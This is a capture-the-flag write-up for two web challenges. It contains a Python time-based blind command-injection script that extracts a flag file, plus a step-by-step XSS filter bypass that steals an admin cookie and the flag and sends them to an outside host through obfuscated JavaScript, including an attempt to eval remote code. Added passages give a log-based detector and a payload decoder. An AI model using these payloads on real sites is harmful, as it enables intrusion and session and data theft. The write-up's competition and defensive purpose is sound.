BJDCTF 3rd web: writeups for two challenges
Published on 2020-05-23

Web-帮帮小红花

Similar to the `cut` blind injection from the i春秋 Christmas contest: any blind-injection technique will extract the flag. Note that & must be escaped (the script below sends it as %26).

import string
import requests

proxies = {"http": "http://127.0.0.1:4476"}
pay = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}-_"
result = ""
while True:
    for i in pay:
        try:
            # %26%26 is the URL-encoded "&&", so the shell rather than the HTTP parser sees it.
            # If the guessed prefix matches, "sleep 10" pushes the request past the 5 s timeout.
            requests.get("http://183.129.189.60:10074/?imagin=grep \"^%s\" /flag %%26%%26 sleep 10" % (result + i),
                         timeout=5, proxies=proxies)
            continue
        except KeyboardInterrupt:
            exit(0)
        except Exception:
            # A timeout means the prefix was right: keep the character and start the next position.
            result += i
            print(result)
            break
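The time-based oracle above leaves a distinctive trace in web-server logs. The following Node.js snippet is an added example, not part of the original writeup or the challenge: it parses constructed access-log lines in the Apache/nginx "combined" format, decodes each query parameter (which is what turns %26%26 back into &&), flags values containing shell metacharacters or timing commands, and counts per source address how many flagged values grow one character at a time, the signature of a character-by-character extraction. The log lines, addresses and timestamps are constructed for the example.

```javascript
// Added example (not from the original writeup): detect the time-based command
// injection used above in web-server access logs. Assumes the Apache/nginx
// "combined" log format; the lines below are constructed sample data.

const SAMPLE_LOG = [
  '10.0.0.5 - - [23/May/2020:10:01:02 +0800] "GET /?imagin=cat.jpg HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [23/May/2020:10:01:07 +0800] "GET /?imagin=grep%20%22%5EBJD%22%20/flag%20%26%26%20sleep%2010 HTTP/1.1" 200 0 "-" "python-requests/2.23"',
  '10.0.0.9 - - [23/May/2020:10:01:19 +0800] "GET /?imagin=grep%20%22%5EBJDC%22%20/flag%20%26%26%20sleep%2010 HTTP/1.1" 200 0 "-" "python-requests/2.23"',
  '10.0.0.7 - - [23/May/2020:10:02:00 +0800] "GET /?imagin=a.png HTTP/1.1" 200 512 "-" "curl/7.68"',
];

// Shell metacharacters and timing commands that never belong in an image name.
const SHELL_META = /[;&|`]|\$\(/;
const TIMING_CMD = /\b(sleep|timeout|ping)\b/i;

// Parse one combined-format line into its request fields.
function parseLine(line) {
  const m = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+)/.exec(line);
  if (!m) return null;
  const [, ip, time, method, target, status, bytes] = m;
  // The base URL only serves to make the relative request target parseable.
  const url = new URL(target, 'http://placeholder.invalid');
  return { ip, time, method, path: url.pathname, params: url.searchParams,
           status: Number(status), bytes: Number(bytes) };
}

// Return one hit per query parameter whose decoded value looks like shell syntax.
function findCommandInjection(lines) {
  const hits = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue;
    for (const [name, value] of req.params) {
      // URLSearchParams has already turned %26%26 back into "&&"; matching on the
      // raw, still-encoded query string would miss exactly the payloads that work.
      const meta = SHELL_META.test(value);
      const timing = TIMING_CMD.test(value);
      if (meta || timing) hits.push({ ip: req.ip, time: req.time, param: name, value, meta, timing });
    }
  }
  return hits;
}

// Per source address, count consecutive timing hits on the same parameter whose
// value is exactly one character longer than the previous one: the grow-by-one
// shape of a character-at-a-time oracle.
function oracleCounts(hits) {
  const counts = {};
  const last = {};
  for (const h of hits) {
    const key = h.ip + ' ' + h.param;
    const prev = last[key];
    if (prev !== undefined && h.timing && h.value.length === prev.length + 1) {
      counts[h.ip] = (counts[h.ip] || 0) + 1;
    }
    last[key] = h.value;
  }
  return counts;
}

console.log(findCommandInjection(SAMPLE_LOG));
console.log(oracleCounts(findCommandInjection(SAMPLE_LOG)));
```

The key design point is to match after decoding: the payload only works because the server decodes %26%26 into && before the shell sees it, so a rule applied to the encoded query string sees neither the metacharacters nor the growing prefix.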

Web-notes

The source hints at a leak; requesting www.zip returns the source code.

<body onpageshow=alert(1) >

When the injected child element is itself a <body>, the browser's parser does not create a second body; it patches the attributes onto the existing body, so the result is treated as if html>body carried the onpageshow attribute.

<body onpageshow=window['location'].href=/111/ >

(/l/+1)[1]

<body onpageshow=window[(/l/+1)[1]+(/o/+1)[1]+(/c/+1)[1]+(/a/+1)[1]+(/t/+1)[1]+(/i/+1)[1]+(/o/+1)[1]+(/n/+1)[1]].href=(/h/+1)[1]+(/t/+1)[1]+(/t/+1)[1]+(/p/+1)[1]+(/:/+1)[1]+(/\//+1)[1]+(/\//+1)[1]+(/a/+1)[1]+(/p/+1)[1]+(/i/+1)[1]+(/./+1)[1]+(/c/+1)[1]+(/h/+1)[1]+(/a/+1)[1]+(/r/+1)[1]+(/a/+1)[1]+(/./+1)[1]+(/p/+1)[1]+(/u/+1)[1]+(/b/+1)[1]+(/\//+1)[1]+document[(/c/+1)[1]+(/o/+1)[1]+(/o/+1)[1]+(/k/+1)[1]+(/i/+1)[1]+(/e/+1)[1]] />

http://172.26.176.1/note.php?note=%3Cbody+onpageshow%3Dwindow%5B%28%2Fl%2F%2B1%29%5B1%5D%2B%28%2Fo%2F%2B1%29%5B1%5D%2B%28%2Fc%2F%2B1%29%5B1%5D%2B%28%2Fa%2F%2B1%29%5B1%5D%2B%28%2Ft%2F%2B1%29%5B1%5D%2B%28%2Fi%2F%2B1%29%5B1%5D%2B%28%2Fo%2F%2B1%29%5B1%5D%2B%28%2Fn%2F%2B1%29%5B1%5D%5D.href%3D%28%2Fh%2F%2B1%29%5B1%5D%2B%28%2Ft%2F%2B1%29%5B1%5D%2B%28%2Ft%2F%2B1%29%5B1%5D%2B%28%2Fp%2F%2B1%29%5B1%5D%2B%28%2F%3A%2F%2B1%29%5B1%5D%2B%28%2F%5C%2F%2F%2B1%29%5B1%5D%2B%28%2F%5C%2F%2F%2B1%29%5B1%5D%2B%28%2Fa%2F%2B1%29%5B1%5D%2B%28%2Fp%2F%2B1%29%5B1%5D%2B%28%2Fi%2F%2B1%29%5B1%5D%2B%28%2F.%2F%2B1%29%5B1%5D%2B%28%2Fc%2F%2B1%29%5B1%5D%2B%28%2Fh%2F%2B1%29%5B1%5D%2B%28%2Fa%2F%2B1%29%5B1%5D%2B%28%2Fr%2F%2B1%29%5B1%5D%2B%28%2Fa%2F%2B1%29%5B1%5D%2B%28%2F.%2F%2B1%29%5B1%5D%2B%28%2Fp%2F%2B1%29%5B1%5D%2B%28%2Fu%2F%2B1%29%5B1%5D%2B%28%2Fb%2F%2B1%29%5B1%5D%2B%28%2F%5C%2F%2F%2B1%29%5B1%5D%2Bdocument%5B%28%2Fc%2F%2B1%29%5B1%5D%2B%28%2Fo%2F%2B1%29%5B1%5D%2B%28%2Fo%2F%2B1%29%5B1%5D%2B%28%2Fk%2F%2B1%29%5B1%5D%2B%28%2Fi%2F%2B1%29%5B1%5D%2B%28%2Fe%2F%2B1%29%5B1%5D%5D+%2F%3E

The URL length is limited to 500, so the payload needs to be shortened.

(/http:\/\/ctf.chara.pub\//+1).substring(1,25)
(/l/+1)[1]+(/ocation/+1).substring(1,8)
(/c/+1)[1]+(/ookies/+1).substring(1,7)

<body onpageshow=window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+document[(/c/+1)[1]+(/ookie/+1).substring(1,6)] />


http://172.26.176.1/note.php?note=%3Cbody+onpageshow%3Dwindow%5B%28%2Fl%2F%2B1%29%5B1%5D%2B%28%2Focation%2F%2B1%29.substring%281%2C8%29%5D.href%3D%28%2Fhttp%3A%5C%2F%5C%2Fctf.chara.pub%5C%2F%2F%2B1%29.substring%281%2C25%29%2Bdocument%5B%28%2Fc%2F%2B1%29%5B1%5D%2B%28%2Fookie%2F%2B1%29.substring%281%2C6%29%5D+%2F%3E

This does capture the admin's PHP session id, but it is of no use here.

a=new XMLHttpRequest();a.open("GET","http://ctf.chara.pub",1);a.onreadystatechange=function(){eval(a.responseText)};a.send(null)

a=new XMLHttpRequest();a.open((/GET/+1).substring(1,4),(/http:\/\/ctf.chara.pub\//+1).substring(1,25),1);a.onreadystatechange (){eval(a.responseText)};a.send(null)

# func is filtered, so use a lambda (arrow function) instead

(/r/+1)[1]+(/esponseText/+1).substring(1,12)

a=new XMLHttpRequest();a.open((/GET/+1).substring(1,4),(/http:\/\/ctf.chara.pub\//+1).substring(1,25),1);a.onreadystatechange=()=>{eval(a[(/r/+1)[1]+(/esponseText/+1).substring(1,12)])};a.send(null)

<body onpageshow=a=new XMLHttpRequest();a.open((/GET/+1).substring(1,4),(/http:\/\/ctf.chara.pub\//+1).substring(1,25),1);a.onreadystatechange=()=>{eval(a[(/r/+1)[1]+(/esponseText/+1).substring(1,12)])};a.send(null) />

The CSP does not allow XMLHttpRequest to reach external addresses, so the remaining option is to read the flag and submit it through the username field.

The username field restricts the format, so either send the payload in segments or use window.location.href.

XMLHttpRequest needs a space for the new keyword, which is not available here, so use fetch instead.

fetch("/lib/flag.php",{method:"GET"}).then((r)=>{r.text().then((r)=>{window.location.href="http://ctf.chara.pub/"+r})})

(/\/lib\/flag.php/+1).substring(2,16)
(/\/lib\/f/+1).substring(2,9)+(/lag.php/+1).substring(1,8)

a=(/t/+1)[1]+(/hen/+1).substring(1,4);window[(/f/+1)[1]+(/etch/+1).substring(1,5)]((/\/lib\/f/+1).substring(2,9)+(/lag.php/+1).substring(1,8),{method:(/GET/+1).substring(1,4)})[a]((r)=>{r.text()[a]((r)=>{window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+r})})

<body onpageshow=a=(/t/+1)[1]+(/hen/+1).substring(1,4);window[(/f/+1)[1]+(/etch/+1).substring(1,5)]((/\/lib\/f/+1).substring(2,9)+(/lag.php/+1).substring(1,8),{method:(/GET/+1).substring(1,4)})[a]((r)=>{r.text()[a]((r)=>{window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+r})}) />

Bypassing =>

Could the string be built directly and passed to eval?

The challenge seems to have been modified; it now filters eval as well.

a=String.fromCharCode;
b=(/fetch(12lib2flag.php1,{method:1GET1}).then((r)=3{r.text().then((r)=3{window.location.href=1http:22ctf.chara.pub21+r})})/+4).replace(/1/g,a(34)).replace(/2/g,a(47)).replace(/3/g,a(62)).substring(1,120);window[(/e/+1)[1]+(/val/+1).substring(1,4)](b)

# the final payload
<body onpageshow=a=String.fromCharCode;b=(/5etch(12lib25lag.php1,{method:1GET1}).th6n((r)=3{r.text().th6n((r)=3{window.l7cation.href=1http:22ctf.chara.pub21+r})})/+4).replace(/1/g,a(34)).replace(/2/g,a(47)).replace(/3/g,a(62)).replace(/5/g,a(102)).replace(/6/g,a(101)).replace(/7/g,a(111)).substring(1,120);window[(/e/+1)[1]+(/val/+1).substring(1,4)](b) />

http://172.26.176.1/note.php?note=%3Cbody+onpageshow%3Da%3DString.fromCharCode%3Bb%3D%28%2F5etch%2812lib25lag.php1%2C%7Bmethod%3A1GET1%7D%29.th6n%28%28r%29%3D3%7Br.text%28%29.th6n%28%28r%29%3D3%7Bwindow.l7cation.href%3D1http%3A22a.chara.pub21%2Br%7D%29%7D%29%2F%2B4%29.replace%28%2F1%2Fg%2Ca%2834%29%29.replace%28%2F2%2Fg%2Ca%2847%29%29.replace%28%2F3%2Fg%2Ca%2862%29%29.replace%28%2F5%2Fg%2Ca%28102%29%29.replace%28%2F6%2Fg%2Ca%28101%29%29.replace%28%2F7%2Fg%2Ca%28111%29%29.substring%281%2C120%29%3Bwindow%5B%28%2Fe%2F%2B1%29%5B1%5D%2B%28%2Fval%2F%2B1%29.substring%281%2C4%29%5D%28b%29+%2F%3E
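All three generations of the payload above (the `(/l/+1)[1]` character picks, the `.substring` shortening, and the final `String.fromCharCode` plus `.replace` chain) rest on one fact: `+` coerces a RegExp with `toString()`, which yields `/source/flags`, so `/l/+1` is the string `/l/1` and index 1 is the source. The decoder below is an added example, not part of the original writeup or the challenge; it resolves those constructs by string manipulation rather than by evaluating them, which is how an analyst would read such a payload out of a log. It assumes the identifier `a` is bound to `String.fromCharCode`, as the final payload sets it. The two fragments it runs on are copied from the payloads in this writeup.

```javascript
// Added example (not from the original writeup or the challenge): resolve the
// RegExp-to-string constructs used in the payloads above without evaluating them.
// Assumption: the name `a` is bound to String.fromCharCode, as the final payload does.

// Why (/l/+1)[1] is "l": + coerces the RegExp via toString(), giving "/source/flags",
// so "/l/" + 1 is the string "/l/1" and index 1 is the first source character.
function regexToString(source, appended) {
  return '/' + source + '/' + appended;
}

// One construct: (/src/+N), optionally followed by .replace(/c/g,a(code)) calls,
// then either [index] or .substring(from,to).
const CONSTRUCT = /\(\/((?:\\.|[^\/\\\n])+)\/\+(\d+)\)((?:\.replace\(\/.\/g,a\(\d+\)\))*)(?:\[(\d+)\]|\.substring\((\d+),(\d+)\))/g;
const REPLACE_CALL = /\.replace\(\/(.)\/g,a\((\d+)\)\)/g;

function resolveConstruct(src, appended, chain, idx, from, to) {
  let s = regexToString(src, appended);
  // Apply the a(code) substitutions in order, exactly as the payload would.
  for (const [, ch, code] of chain.matchAll(REPLACE_CALL)) {
    s = s.split(ch).join(String.fromCharCode(Number(code)));
  }
  return idx !== undefined ? s[Number(idx)] : s.substring(Number(from), Number(to));
}

// Resolve a single construct to the plain string it evaluates to.
function resolve(fragment) {
  const m = new RegExp(CONSTRUCT.source).exec(fragment);
  if (!m) throw new Error('not a RegExp-literal construct: ' + fragment);
  return resolveConstruct(m[1], m[2], m[3], m[4], m[5], m[6]);
}

// Rewrite every construct in a payload as a string literal, then fold "a"+"b" into "ab".
function decode(payload) {
  let out = payload.replace(CONSTRUCT, (_, src, appended, chain, idx, from, to) =>
    JSON.stringify(resolveConstruct(src, appended, chain, idx, from, to)));
  const PAIR = /"((?:\\.|[^"\\])*)"\+"((?:\\.|[^"\\])*)"/;
  while (PAIR.test(out)) out = out.replace(PAIR, '"$1$2"');
  return out;
}

// Fragments copied from the payloads in this writeup.
const COOKIE_PAYLOAD = String.raw`window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+document[(/c/+1)[1]+(/ookie/+1).substring(1,6)]`;
const FINAL_B = String.raw`(/5etch(12lib25lag.php1,{method:1GET1}).th6n((r)=3{r.text().th6n((r)=3{window.l7cation.href=1http:22ctf.chara.pub21+r})})/+4).replace(/1/g,a(34)).replace(/2/g,a(47)).replace(/3/g,a(62)).replace(/5/g,a(102)).replace(/6/g,a(101)).replace(/7/g,a(111)).substring(1,120)`;

console.log(decode(COOKIE_PAYLOAD));
console.log(resolve(FINAL_B));
```

One detail the decoded cookie payload makes visible: the resolved URL keeps the `\/` escapes of the regex source, so the navigation target is literally `http:\/\/ctf.chara.pub\/…`. It still works because the URL parser in browsers treats `\` as `/` in http URLs, which is also why a detection rule that matches on hostnames has to normalize backslashes before comparing.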



The length may still be slightly over the limit (my own test came out at 499); serving a 302 redirect from a small Flask app also works.
